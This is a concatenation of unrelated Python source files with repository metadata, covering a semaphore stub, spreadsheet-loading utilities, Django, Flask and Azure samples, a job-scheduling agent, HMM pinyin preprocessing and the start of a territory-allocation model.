def _get_value(self, *args, **kwargs): # real signature unknown
""" get the value of the semaphore """
pass
def _is_mine(self, *args, **kwargs): # real signature unknown
""" whether the lock is owned by this thread """
pass
def _is_zero(self, *args, **kwargs): # real signature unknown
""" returns whether semaphore has value zero """
pass
@classmethod
def _rebuild(cls, *args, **kwargs): # real signature unknown
""" """
pass
def __enter__(self, *args, **kwargs): # real signature unknown
""" enter the semaphore/lock """
pass
def __exit__(self, *args, **kwargs): # real signature unknown
""" exit the semaphore/lock """
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
handle = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
kind = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
maxvalue = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
SEM_VALUE_MAX = 2147483647L
# variables with complex values
flags = {
'HAVE_FD_TRANSFER': 1,
'HAVE_SEM_OPEN': 1,
'HAVE_SEM_TIMEDWAIT': 1,
}
|
[
"sirnikolasd@yandex.ru"
] |
sirnikolasd@yandex.ru
|
3230e906d4b1aa90eb08e3bde5029121942a2cbd
|
7f3d3d02c3ab6e14e72ba4852828071af37088b5
|
/unicorn/utils.py
|
28b212cd4e1e3a2979ad7dbf787622b52a3ff4c3
|
[
"MIT"
] |
permissive
|
phantasy-project/unicorn
|
cf28b936e2a11ba551724fda8ad7f72da129b661
|
25d790adb1c4390eb715249dc94423228997f3a4
|
refs/heads/master
| 2021-10-27T06:23:33.688585
| 2021-10-15T19:28:01
| 2021-10-15T19:28:01
| 150,592,912
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,355
|
py
|
# -*- coding: utf-8 -*-
import pickle
import codecs
import xlrd
import numpy as np
import sys
from collections import namedtuple
DATA_X_COL_IDX = 7
DATA_Y_COL_IDX = 8
UniFunc = namedtuple('UniFunc',
'name ename from_field to_field description args code code_str data_x data_y')
def pickle_obj(obj, coding='base64'):
"""Pickle object into string for being a REST parameter.
"""
return codecs.encode(pickle.dumps(obj), coding).decode()
class UnicornData(object):
"""Parsing data from external xlsx file.
Examples
--------
>>> f = 'data.xlsx'
>>> data = UnicornData(f)
>>> for f in data.functions:
>>> client.create(**f)
>>> # client is an AdminClient instance
>>>
"""
def __init__(self, xlsx_file, **kws):
try:
book = xlrd.open_workbook(xlsx_file)
except:
print("Open xlsx file failed.")
sys.exit(1)
self.data_x_col_idx = kws.get('data_x_col_idx', DATA_X_COL_IDX)
self.data_y_col_idx = kws.get('data_y_col_idx', DATA_Y_COL_IDX)
self.sheet = book.sheet_by_index(0)
self.ncols, self.nrows = self.sheet.ncols, self.sheet.nrows
self.header = [x.value for x in self.sheet.row(0)]
self.functions = self.generate_functions()
def generate_functions(self):
for ridx in range(1, self.nrows):
row = [v.value for v in self.sheet.row(ridx)]
x_raw = row[self.data_x_col_idx]
row[self.data_x_col_idx] = pickle_obj(
np.array([float(v) for v in x_raw.split()]))
y_raw = row[self.data_y_col_idx]
row[self.data_y_col_idx] = pickle_obj(
np.array([float(v) for v in y_raw.split()]))
f = dict(zip(self.header, row))
yield to_tuple(f)
def to_tuple(f):
"""Convert dict *f* to namedTuple.
"""
attr = {k: v for k, v in f.items()}
attr['code_str'] = attr['code']
attr['code'] = get_func(attr['code'])
return UniFunc(**attr)
def get_func(fstr):
"""Return function object from code.
"""
fncode, ns = compile(fstr, "<string>", "exec"), {}
exec(fncode, ns)
return ns.get('f')
def to_dict(d):
ret = {}
for k,v in d.items():
try:
ret[k] = float(v)
except:
ret[k] = v
return ret
|
[
"zhangt@frib.msu.edu"
] |
zhangt@frib.msu.edu
|
78db018846126fb9febd6f19a4e4506f2d44c459
|
4ea4f9f8cbb652aea7f82089eb39b8a86a466a81
|
/lib/muchos/config/__init__.py
|
13294f17e2ca9040fc4f68596eaa0a65f18d19d9
|
[
"Apache-2.0"
] |
permissive
|
shannawaz/fluo-muchos
|
62ef9bf65baae3a823630fc11e35b4620aac2056
|
98102a5b14a71642a7972d20d57b38373a375577
|
refs/heads/master
| 2020-09-24T02:40:37.204495
| 2020-03-24T18:06:38
| 2020-03-24T18:06:38
| 225,641,914
| 0
| 0
|
Apache-2.0
| 2019-12-03T14:37:26
| 2019-12-03T14:37:26
| null |
UTF-8
|
Python
| false
| false
| 1,700
|
py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from muchos.config.base import BaseConfig, SERVICES, OPTIONAL_SERVICES
from muchos.config.existing import ExistingDeployConfig
from muchos.config.ec2 import Ec2DeployConfig
from muchos.config.azure import AzureDeployConfig
from configparser import ConfigParser
def DeployConfig(deploy_path, config_path, hosts_path, checksums_path, templates_path, cluster_name):
c = ConfigParser()
c.read(config_path)
cluster_type = c.get('general', 'cluster_type')
if cluster_type == 'existing':
return ExistingDeployConfig(deploy_path, config_path, hosts_path, checksums_path, templates_path, cluster_name)
if cluster_type == 'ec2':
return Ec2DeployConfig(deploy_path, config_path, hosts_path, checksums_path, templates_path, cluster_name)
if cluster_type == 'azure':
return AzureDeployConfig(deploy_path, config_path, hosts_path, checksums_path, templates_path, cluster_name)
|
[
"kturner@apache.org"
] |
kturner@apache.org
|
d4198914f012849544bc1c5edb24c3a5c7164a20
|
6151a3c25988eb4eac0c00289b90b2e42d4960eb
|
/homeworks/HW01/tests/q3.1.4.py
|
169c9f8d67015fae9fa40c7ff6828bffde9e7c4e
|
[] |
no_license
|
BC-COMS-2710/summer21-material
|
8e3bbbb375433fa0b575cf39eed4bdf2d3b486d3
|
f07ffc1595d7a924a5fca0636161ded26b28e655
|
refs/heads/master
| 2023-05-28T22:52:25.941752
| 2021-06-10T14:44:42
| 2021-06-10T14:44:42
| 353,820,186
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 545
|
py
|
test = { 'name': 'q3.1.4',
'points': [0.1, 0.1],
'suites': [ { 'cases': [ {'code': '>>> assert easiest_fres_pres != ...;\n>>> assert easiest_fres_year != ...\n', 'hidden': False, 'locked': False},
{'code': '>>> assert type(easiest_fres_pres) == str;\n>>> assert "int" in str(type(easiest_fres_year))\n', 'hidden': False, 'locked': False}],
'scored': True,
'setup': '',
'teardown': '',
'type': 'doctest'}]}
|
[
"azpoliak@gmail.com"
] |
azpoliak@gmail.com
|
ba86f9ca658290dd2ff911890bc481e0c6568938
|
82e7b27cc4377def80c2b475645d502e40a0e498
|
/newsletter/migrations/0009_auto_20160215_0258.py
|
d627d656950946d66269e848a6dd0b1a53943507
|
[] |
no_license
|
craYBoi/bryte
|
850698e735a08ea10a08a78dc9e23b7e760c682f
|
d2b5a74d200ccb06cc3ef4e3180b83cbc338ce3e
|
refs/heads/master
| 2022-12-12T08:54:56.863372
| 2017-06-28T05:03:32
| 2017-06-28T05:03:32
| 63,019,677
| 0
| 0
| null | 2022-11-22T01:00:25
| 2016-07-10T21:44:41
|
CSS
|
UTF-8
|
Python
| false
| false
| 475
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-02-15 02:58
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('newsletter', '0008_auto_20160215_0249'),
]
operations = [
migrations.AlterField(
model_name='price',
name='price',
field=models.PositiveSmallIntegerField(blank=True, null=True),
),
]
|
[
"baoyuyang@Yuyangs-MacBook-Pro.local"
] |
baoyuyang@Yuyangs-MacBook-Pro.local
|
03221d11ae596056771dd6a40155d30b9efb8bb4
|
7d98a40b425bfae9cac908d227a90e040300f3e8
|
/app/main/errors.py
|
5d2f11e1532ea3e234aa61423854b6769a8a9f4b
|
[
"MIT",
"ODbL-1.0"
] |
permissive
|
jmeydam/alternative-destinations
|
b999b340590fa0ceb162e5de1b2170e510affb31
|
dec000db45a8005ff5408bc9756ea13f821b52f1
|
refs/heads/master
| 2020-04-13T20:17:53.900399
| 2019-10-24T16:01:27
| 2019-10-24T16:01:27
| 163,426,383
| 0
| 0
|
MIT
| 2019-10-25T11:19:45
| 2018-12-28T15:52:02
|
Python
|
UTF-8
|
Python
| false
| false
| 253
|
py
|
from flask import render_template
from . import main
@main.app_errorhandler(404)
def page_not_found(e):
return render_template('404.html'), 404
@main.app_errorhandler(500)
def internal_server_error(e):
return render_template('500.html'), 500
|
[
"jmeydam@gmail.com"
] |
jmeydam@gmail.com
|
401fa3bf6245f4b4d4def26da033aa3a82b885bf
|
57588093c6ed6dff087d71073eabb061210bd5eb
|
/myproject/urls.py
|
22a7f73fecef274020ae45dcdcdc6d96f784f13a
|
[] |
no_license
|
python-ottawa/opag
|
a2249a0da49af586c01934f9cf9e6596815d8733
|
66ea38475974f0e0edf04c3e9b86e612fedf8fb8
|
refs/heads/master
| 2021-07-03T14:47:36.498972
| 2015-06-24T22:27:32
| 2015-06-24T22:27:32
| 35,083
| 2
| 1
| null | 2021-06-10T17:27:49
| 2008-07-18T01:11:44
|
HTML
|
UTF-8
|
Python
| false
| false
| 715
|
py
|
from django.conf.urls.defaults import *
from django.contrib import admin
from django.conf import settings
admin.autodiscover()
urlpatterns = patterns('',
# To serve static content in development.
# Admin access
(r'^admin/', include(admin.site.urls)),
# Default handler is the main app.
(r'', include('myproject.main.urls'))
)
if settings.DEVELOPMENT:
# If in development mode
urlpatterns += patterns('',
# To serve static content in development.
(r'^static/(?P<path>.*)$',
'django.views.static.serve',
{'document_root': settings.STATIC_ROOT}),
)
handler404 = 'myproject.main.views.notfound'
handler500 = 'myproject.main.views.servererror'
|
[
"msoulier@digitaltorque.ca"
] |
msoulier@digitaltorque.ca
|
3678b34fa02bf2efb255c7b1a52c9d39e07c3bfb
|
b78c255d1c8b917c21bf689f5f9153d765fbe195
|
/dogpack/apps/2d/advection/rotating_unst/plotq2_unst.py
|
7daa00269f64d5c3e12163634a8895661de93be2
|
[] |
no_license
|
smoe1/ImplicitExplicit
|
8be586bed84b1a661e5fe71f5b063dcd406643fa
|
2b9a2d54110ca0f787d4252b9a8cc6d64b23b08d
|
refs/heads/master
| 2016-09-08T02:39:48.371767
| 2015-09-15T21:15:08
| 2015-09-15T21:15:08
| 41,374,555
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,142
|
py
|
#----------------------------------------------------------
def plotq2_unst(outputdir, n1, m, meqn, NumPhysElems, NumPhysNodes,
xlow, xhigh, ylow, yhigh, time, x, y,
tnode, qsoln, xmid, ymid, qsoln_elem):
import numpy as np
import matplotlib.pyplot as plt
from math import sqrt
from math import pow
from math import cos
from math import sin
from math import pi
plt.figure(1)
plt.clf()
plt.gca().set_aspect('equal')
plt.gca().set_xlim([xlow,xhigh])
#plt.gca().set_ylim([ylow,yhigh])
p1=plt.tripcolor(x, y, tnode, qsoln[:,m], shading='faceted', vmin=0.0, vmax=1.0)
tmp1 = "".join(("q(",str(m+1),") at t = "))
tmp2 = "".join((tmp1,str(time)))
title = "".join((tmp2," [DoGPack]"))
plt.title(title)
plt.colorbar()
plt.draw()
x0 = -0.25*cos(2.0*pi*time) + 0.50
y0 = 0.25*sin(2.0*pi*time) + 0.50
r = np.zeros(NumPhysElems,float)
for i in range(0,NumPhysElems):
r[i] = sqrt(pow(xmid[i]-x0,2)+pow(ymid[i]-y0,2))
ind = r.argsort()
qscat_ex = np.zeros((NumPhysElems,meqn),float)
qex(NumPhysElems,meqn,r,qscat_ex)
err = np.linalg.norm(qscat_ex[:,m]-qsoln_elem[:,m])/np.linalg.norm(qscat_ex[:,m])
print ""
print " Error = ",'{:e}'.format(err)
print ""
plt.figure(2)
plt.clf()
plt.gca().set_aspect('auto')
plt.gca().set_xlim([0.0,0.5])
#plt.gca().set_ylim([0.0,1.0])
plt.plot(r[ind],qscat_ex[ind,m],'k-')
plt.plot(r[ind],qsoln_elem[ind,m],'bo')
tmp1 = "".join(("Scattor plot of q(",str(m+1),") at t = "))
tmp2 = "".join((tmp1,str(time)))
title = "".join((tmp2," [DoGPack]"))
plt.title(title)
plt.draw()
#----------------------------------------------------------
#----------------------------------------------------------
def qex(NumPhysElems,meqn,r,qscat_ex):
from math import pow
from math import cos
from math import pi
for i in range(NumPhysElems):
if (r[i]<0.2):
qscat_ex[i,0] = pow( cos(5.0/2.0*pi*r[i]) ,6)
#----------------------------------------------------------
|
[
"smoe@uw.edu"
] |
smoe@uw.edu
|
afa6b518a0c6de01cc70441c23e6ca16e0edd3b8
|
74d1757d8788d5892a8853b15749391fdf9c1a6a
|
/TaskAPI/TaskAPI/urls.py
|
4ba00b3c745c334f8fa19b18ffbc3b133f84f7e8
|
[] |
no_license
|
gogobook/TaskAPI
|
e3139a70f2f5257c83a590e13005ac4f7740f1d4
|
9b918659bba4aa562000219ef65dbce21a363f10
|
refs/heads/master
| 2020-06-30T23:46:14.955729
| 2016-11-23T09:31:13
| 2016-11-23T09:31:13
| 74,561,224
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,151
|
py
|
"""TaskAPI URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include, url
from django.contrib import admin
from rest_framework import routers
from django.conf.urls.static import static
from . import settings
from TaskApp import views
#Define API Routes
#router = .... #we will try with SimpleRouter
router = routers.SimpleRouter()
router.register(r'task', views.TaskViewSet)
urlpatterns = [
url(r'^',include(router.urls)),
url(r'^admin/', include(admin.site.urls)),
]+static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)
|
[
"O968041428@gmail.com"
] |
O968041428@gmail.com
|
086aebcfe4c9dc2fee2d104a55ae67c41c0a5a78
|
a9c9316fe425dac911ca6b3e33d2c76c48e428b3
|
/maro/cli/process/agent/job_agent.py
|
9949099a4a06c3dc64c4c01c928c20c7d4ebcf1d
|
[
"MIT",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
00mjk/maro
|
a64601d5c43a7e6808b1cab1c19be15595395ce1
|
05a64a67fee7d2c4198a57593c464d64e0a8ce7f
|
refs/heads/master
| 2023-03-11T16:58:54.043497
| 2021-02-10T15:31:58
| 2021-02-10T15:31:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,593
|
py
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import json
import multiprocessing as mp
import os
import subprocess
import time
import psutil
import redis
from maro.cli.process.utils.details import close_by_pid, get_child_pid, load_setting_info
from maro.cli.utils.params import LocalPaths, ProcessRedisName
class PendingJobAgent(mp.Process):
def __init__(self, redis_connection, check_interval: int = 60):
super().__init__()
self.redis_connection = redis_connection
self.check_interval = check_interval
def run(self):
while True:
self._check_pending_ticket()
time.sleep(self.check_interval)
def _check_pending_ticket(self):
# Check pending job ticket
pending_jobs = self.redis_connection.lrange(ProcessRedisName.PENDING_JOB_TICKETS, 0, -1)
for job_name in pending_jobs:
job_detail = json.loads(self.redis_connection.hget(ProcessRedisName.JOB_DETAILS, job_name))
running_jobs_length = self.redis_connection.hlen(ProcessRedisName.RUNNING_JOB)
parallel_level = self.redis_connection.hget(ProcessRedisName.SETTING, "parallel_level")
# Start pending job only if current running job's number less than parallel level.
if int(parallel_level) > running_jobs_length:
self._start_job(job_detail)
self.redis_connection.lrem(ProcessRedisName.PENDING_JOB_TICKETS, 0, job_name)
def _start_job(self, job_details: dict):
command_pid_list = []
for component_type, command_info in job_details["components"].items():
component_number = command_info["num"]
component_command = f"JOB_NAME={job_details['name']} " + command_info["command"]
for number in range(component_number):
job_local_path = os.path.expanduser(f"{LocalPaths.MARO_PROCESS}/{job_details['name']}")
if not os.path.exists(job_local_path):
os.makedirs(job_local_path)
with open(f"{job_local_path}/{component_type}_{number}.log", "w") as log_file:
proc = subprocess.Popen(component_command, shell=True, stdout=log_file)
command_pid = get_child_pid(proc.pid)
command_pid_list.append(command_pid)
self.redis_connection.hset(ProcessRedisName.RUNNING_JOB, job_details["name"], json.dumps(command_pid_list))
class JobTrackingAgent(mp.Process):
def __init__(self, redis_connection, check_interval: int = 60):
super().__init__()
self.redis_connection = redis_connection
self.check_interval = check_interval
self._shutdown_count = 0
self._countdown = self.redis_connection.hget(ProcessRedisName.SETTING, "agent_countdown")
def run(self):
while True:
self._check_job_status()
time.sleep(self.check_interval)
keep_alive = int(self.redis_connection.hget(ProcessRedisName.SETTING, "keep_agent_alive"))
if not keep_alive:
self._close_agents()
def _check_job_status(self):
running_jobs = self.redis_connection.hgetall(ProcessRedisName.RUNNING_JOB)
running_jobs = {job_name.decode(): json.loads(pid_list) for job_name, pid_list in running_jobs.items()}
for running_job, pid_list in running_jobs.items():
# Check pid status
still_alive = False
for pid in pid_list:
if psutil.pid_exists(pid):
still_alive = True
# Update if no pid exists
if not still_alive:
self.redis_connection.hdel(ProcessRedisName.RUNNING_JOB, running_job)
def _close_agents(self):
if (
not self.redis_connection.hlen(ProcessRedisName.RUNNING_JOB) and
not self.redis_connection.llen(ProcessRedisName.PENDING_JOB_TICKETS)
):
self._shutdown_count += 1
else:
self._shutdown_count = 0
if self._shutdown_count >= self._countdown:
agent_pid = int(self.redis_connection.hget(ProcessRedisName.SETTING, "agent_pid"))
# close agent
close_by_pid(pid=agent_pid, recursive=True)
# Set agent status to 0
self.redis_connection.hset(ProcessRedisName.SETTING, "agent_status", 0)
class KilledJobAgent(mp.Process):
def __init__(self, redis_connection, check_interval: int = 60):
super().__init__()
self.redis_connection = redis_connection
self.check_interval = check_interval
def run(self):
while True:
self._check_kill_ticket()
time.sleep(self.check_interval)
def _check_kill_ticket(self):
# Check pending job ticket
killed_job_names = self.redis_connection.lrange(ProcessRedisName.KILLED_JOB_TICKETS, 0, -1)
for job_name in killed_job_names:
if self.redis_connection.hexists(ProcessRedisName.RUNNING_JOB, job_name):
pid_list = json.loads(self.redis_connection.hget(ProcessRedisName.RUNNING_JOB, job_name))
close_by_pid(pid=pid_list, recursive=False)
self.redis_connection.hdel(ProcessRedisName.RUNNING_JOB, job_name)
else:
self.redis_connection.lrem(ProcessRedisName.PENDING_JOB_TICKETS, 0, job_name)
self.redis_connection.lrem(ProcessRedisName.KILLED_JOB_TICKETS, 0, job_name)
class MasterAgent:
def __init__(self):
setting_info = load_setting_info()
self.check_interval = setting_info["check_interval"]
self.redis_connection = redis.Redis(
host=setting_info["redis_info"]["host"],
port=setting_info["redis_info"]["port"]
)
self.redis_connection.hset(ProcessRedisName.SETTING, "agent_pid", os.getpid())
def start(self) -> None:
"""Start agents."""
pending_job_agent = PendingJobAgent(
redis_connection=self.redis_connection,
check_interval=self.check_interval
)
pending_job_agent.start()
killed_job_agent = KilledJobAgent(
redis_connection=self.redis_connection,
check_interval=self.check_interval
)
killed_job_agent.start()
job_tracking_agent = JobTrackingAgent(
redis_connection=self.redis_connection,
check_interval=self.check_interval
)
job_tracking_agent.start()
if __name__ == "__main__":
master_agent = MasterAgent()
master_agent.start()
|
[
"noreply@github.com"
] |
00mjk.noreply@github.com
|
0e20b8dd3e3ed1558f602d3055cc0b3c37906bf2
|
50df6586213af876ee741be559434537b1ef03ef
|
/first/second.py
|
ff1e56b06a3fb21265e3ceeb8b06c36996b077d9
|
[] |
no_license
|
ujjwalagr/HacktoberFest
|
e4329550cb320f4b3a369a91e4de51857b6e4755
|
884d5993c8ac30a4af23d213f3b22002eb7bd39b
|
refs/heads/master
| 2020-08-08T15:11:47.778438
| 2019-10-09T08:10:36
| 2019-10-09T08:10:36
| 213,856,036
| 0
| 2
| null | 2019-10-13T08:37:07
| 2019-10-09T07:56:08
|
Python
|
UTF-8
|
Python
| false
| false
| 16
|
py
|
print('second')
|
[
"ujjwalagrawal53@gmail.com"
] |
ujjwalagrawal53@gmail.com
|
70044d57fced0a79461899cfe23e9212aef8c5de
|
1dafc27c7f754f936135ef8614ab291854034022
|
/samples/compute/disable_manage_disk_encryption_set.py
|
2d93c612d3dc60bada457e5fdc07c1f45c83cea8
|
[
"MIT"
] |
permissive
|
ArunAyyagari/azure-samples-python-management
|
6f329b35e71939a5539e164e55097a15c6d7dea6
|
cfe187ce49aad35d84d0a61ba6d3ef156095ff0c
|
refs/heads/master
| 2022-08-29T03:10:47.894017
| 2020-05-25T02:32:18
| 2020-05-25T02:32:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,563
|
py
|
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import os
from dateutil import parser as date_parse
from azure.identity import DefaultAzureCredentials
from azure.keyvault.keys import KeyClient
from azure.mgmt.compute import ComputeManagementClient
from azure.mgmt.keyvault import KeyVaultManagementClient
from azure.mgmt.resource import ResourceManagementClient
def main():
SUBSCRIPTION_ID = os.environ.get("SUBSCRIPTION_ID", None)
TENANT_ID = os.environ.get("AZURE_TENANT_ID", None)
DISK_ENCRYPTION_SET_NAME = "diskencryptionsetxxx"
GROUP_NAME = "testgroupx"
KEY_VAULT = "keyvaultxyzxxxxx"
# Create client
# For other authentication approaches, please see: https://pypi.org/project/azure-identity/
resource_client = ResourceManagementClient(
credential=DefaultAzureCredentials(),
subscription_id=SUBSCRIPTION_ID
)
compute_client = ComputeManagementClient(
credential=DefaultAzureCredentials(),
subscription_id=SUBSCRIPTION_ID
)
keyvault_client = KeyVaultManagementClient(
credentials=DefaultAzureCredentials(),
subscription_id=SUBSCRIPTION_ID
)
# Create resource group
resource_client.resource_groups.create_or_update(
GROUP_NAME,
{"location": "eastus"}
)
# Create key
vault = keyvault_client.vaults.create_or_update(
GROUP_NAME,
KEY_VAULT,
{
'location': "eastus",
'properties': {
'sku': {
'name': 'standard'
},
'tenant_id': TENANT_ID,
"access_policies": [
{
"tenant_id": TENANT_ID,
"object_id": "123743cc-88ef-49ee-920e-13958fe5697d",
"permissions": {
"keys": [
"encrypt",
"decrypt",
"wrapKey",
"unwrapKey",
"sign",
"verify",
"get",
"list",
"create",
"update",
"import",
"delete",
"backup",
"restore",
"recover",
"purge"
]
}
}
],
'enabled_for_disk_encryption': True,
}
}
).result()
key_client = KeyClient(vault.properties.vault_uri, DefaultAzureCredentials())
expires_on = date_parse.parse("2050-02-02T08:00:00.000Z")
key = key_client.create_key(
"testkey",
"RSA",
size=2048,
expires_on=expires_on
)
# Create disk encryption set
encryption_set = compute_client.disk_encryption_sets.begin_create_or_update(
GROUP_NAME,
DISK_ENCRYPTION_SET_NAME,
{
"location": "eastus",
"identity": {
"type": "SystemAssigned"
},
"active_key": {
"source_vault": {
"id": vault.id
},
"key_url": key.id
}
}
).result()
print("Create disk encryption set:\n{}".format(encryption_set))
# Get disk encrytion set
encryption_set = compute_client.disk_encryption_sets.get(
GROUP_NAME,
DISK_ENCRYPTION_SET_NAME
)
print("Get disk encryption set:\n{}".format(encryption_set))
# Update disk encryption set
encryption_set = compute_client.disk_encryption_sets.begin_update(
GROUP_NAME,
DISK_ENCRYPTION_SET_NAME,
{
"active_key": {
"source_vault": {
"id": vault.id
},
"key_url": key.id
},
"tags": {
"department": "Development",
"project": "Encryption"
}
}
).result()
print("Update disk encryption set:\n{}".format(encryption_set))
# Delete disk encryption set
compute_client.disk_encryption_sets.begin_delete(
GROUP_NAME,
DISK_ENCRYPTION_SET_NAME
)
print("Delete disk encryption set.\n")
# Delete Group
resource_client.resource_groups.begin_delete(
GROUP_NAME
).result()
if __name__ == "__main__":
main()
|
[
"sunkaihuisos@gmail.com"
] |
sunkaihuisos@gmail.com
|
5260c2df4a64f3a54d8b18ae12abc281fe8a4af7
|
06d09ea58ce1cfc0501ed598dbecda4273597567
|
/HMM/process_finally.py
|
601d32af19718cde39116fa35d48b669077234a8
|
[] |
no_license
|
SunflowerAries/Pinyin-to-Character
|
0c0abdbf7cc07d902f43ad9c3b8103e887a483e2
|
363faaf1b3f3fb3addce11f2b3d4bc9af62f588f
|
refs/heads/master
| 2020-11-30T08:28:48.738699
| 2020-01-12T14:20:05
| 2020-01-12T14:20:05
| 230,356,429
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,914
|
py
|
# coding: utf-8
import json, codecs
BASE_START_FILE = 'data/base_start.json'
BASE_EMISSION_FILE = 'data/base_emission.json'
BASE_TRANSITION_FILE = 'data/base_transition.json'
ALL_STATES_FILE = 'data/all_states.txt' # 所有的字
ALL_OBSERVATIONS_FILE = 'data/all_observations.txt' # 所有的拼音
PY2HZ_FILE = 'data/pinyin2hanzi.txt'
HZ2PY_FILE = 'hanzipinyin.txt'
FIN_PY2HZ_FILE = 'data/hmm_py2hz.json'
FIN_START_FILE = 'data/hmm_start.json'
FIN_EMISSION_FILE = 'data/hmm_emission.json'
FIN_TRANSITION_FILE = 'data/hmm_transition.json'
PINYIN_NUM = 411.
HANZI_NUM = 20903.
def writejson2file(obj, filename):
json.dump(obj, open(filename, 'w'), sort_keys=True)
def readdatafromfile(filename):
return json.load(open(filename, 'r'))
def gen_py2hz():
data = {}
with codecs.open(PY2HZ_FILE, 'r', 'utf-8') as fin:
while True:
line = fin.readline()
if not line: break
line = line.strip()
ls = line.split('=')
if len(ls) != 2:
raise Exception('invalid format')
py, chars = ls
py = py.strip()
chars = chars.strip()
if len(py)>0 and len(chars)>0:
data[py] = chars
writejson2file(data, FIN_PY2HZ_FILE)
def gen_start():
data = {'default': 1, 'data': None}
start = readdatafromfile(BASE_START_FILE)
count = HANZI_NUM
for hanzi in start:
count += start[hanzi]
for hanzi in start:
start[hanzi] = start[hanzi] / count
data['default'] = 1.0 / count
data['data'] = start
writejson2file(data, FIN_START_FILE)
def gen_emission():
"""
base_emission = {} #> {'泥': {'ni':1.0}, '了':{'liao':0.5, 'le':0.5}}
"""
data = {'default': 1.e-200, 'data': None}
emission = readdatafromfile(BASE_EMISSION_FILE)
for hanzi in emission:
num_sum = 0.
for pinyin in emission[hanzi]:
num_sum += emission[hanzi][pinyin]
for pinyin in emission[hanzi]:
emission[hanzi][pinyin] = emission[hanzi][pinyin] / num_sum
data['data'] = emission
writejson2file(data, FIN_EMISSION_FILE)
def gen_tramsition():
"""
{'你': {'好':10, '们':2}, '我': {}}
"""
data = {'default': 1./HANZI_NUM, 'data': None}
transition = readdatafromfile(BASE_TRANSITION_FILE)
for c1 in transition:
num_sum = HANZI_NUM # 默认每个字都有机会
for c2 in transition[c1]:
num_sum += transition[c1][c2]
for c2 in transition[c1]:
transition[c1][c2] = float(transition[c1][c2]+1) / num_sum
transition[c1]['default'] = 1./num_sum
data['data'] = transition
writejson2file(data, FIN_TRANSITION_FILE)
def main():
gen_py2hz()
gen_start()
gen_emission()
gen_tramsition()
if __name__ == '__main__':
main()
|
[
"17307130191@fudan.edu.cn"
] |
17307130191@fudan.edu.cn
|
2e123c89f8d30f43907e5e3da0590091363d41cd
|
aded26493d24aa5d902498f4c8406a68993f9eca
|
/model.py
|
ebc06ba10c1988c0ff3d9dd65e81c124fdafa128
|
[] |
no_license
|
vampiirre/territorial-conflict
|
e88c7dbb07e8336d4c3c8e771e27918eda447b1e
|
5c107291f515e5856a3e19b024893148ae34acec
|
refs/heads/master
| 2020-05-27T16:02:37.596300
| 2020-05-19T15:17:56
| 2020-05-19T15:17:56
| 188,692,020
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 115,594
|
py
|
import matplotlib.pyplot as plt
import numpy as np
import matplotlib as mpl
import matplotlib.dates as mdates
import datetime as dt
import csv
import matplotlib.animation
from matplotlib import cm
from scipy.io import loadmat
import pandas as pd
import sys
import tqdm
from tqdm import tqdm_notebook
import pickle
import _pickle
import cvxpy
import random
import math
import copy
from IPython.html import widgets
from IPython.display import display,clear_output
from mpl_toolkits.mplot3d import Axes3D
import warnings
warnings.filterwarnings('ignore')
import time
%matplotlib notebook
%matplotlib notebook
class Territory:
def __init__(self, name, row, column, resources, sphere = True, radius = 900.1, percent = False): # объявление территории(Название, высота, ширина, кол-во ресурсов, есть ли искревление, радиус искревления)
#массив участков ([ресурсы,], root or eez?, страна+1, [дистанции], [польза], eez?)
self.unos = [[[[0] * resources, False, -1, [], [], False] for i in range(column)] for i in range(row)]
self.countries = [] # массив стран (приоритеты, удовлетворение, корни, территоии, eez)
self.name = name # название территории
self.names = [] # название стран
self.ind = [] # массив индикаторов стран нужный для charity и fun_balance
self.d = [] # границы полезности
self.change_map = [] # массив изменения карты для анимации
self.change_sati = [] # массив изменени удовлетворений стран для гистограммы c 0 по последнюю итерацию
self.start_map = [] # первый вариант карты
self.start_map_diff = [] # первый вариант карты с расширенной расцветкой
self.res_map = np.zeros((resources, row, column)) # карты ресурсов
self.dist_map = [] # карты расстояний
self.sati_map = [] # карты полезностей
self.transferable = [] # массив реальных элементов которые можно передавать
self.i_char = 0 # счётчик количества передачи участков из-за charity
self.i_exch = 0 # счётчик количества передачи участков из-за exchange
self.i_exch2 = 0 # счётчик количества обменов в exchange
self.isave = 0 # индикатор сохранения карты
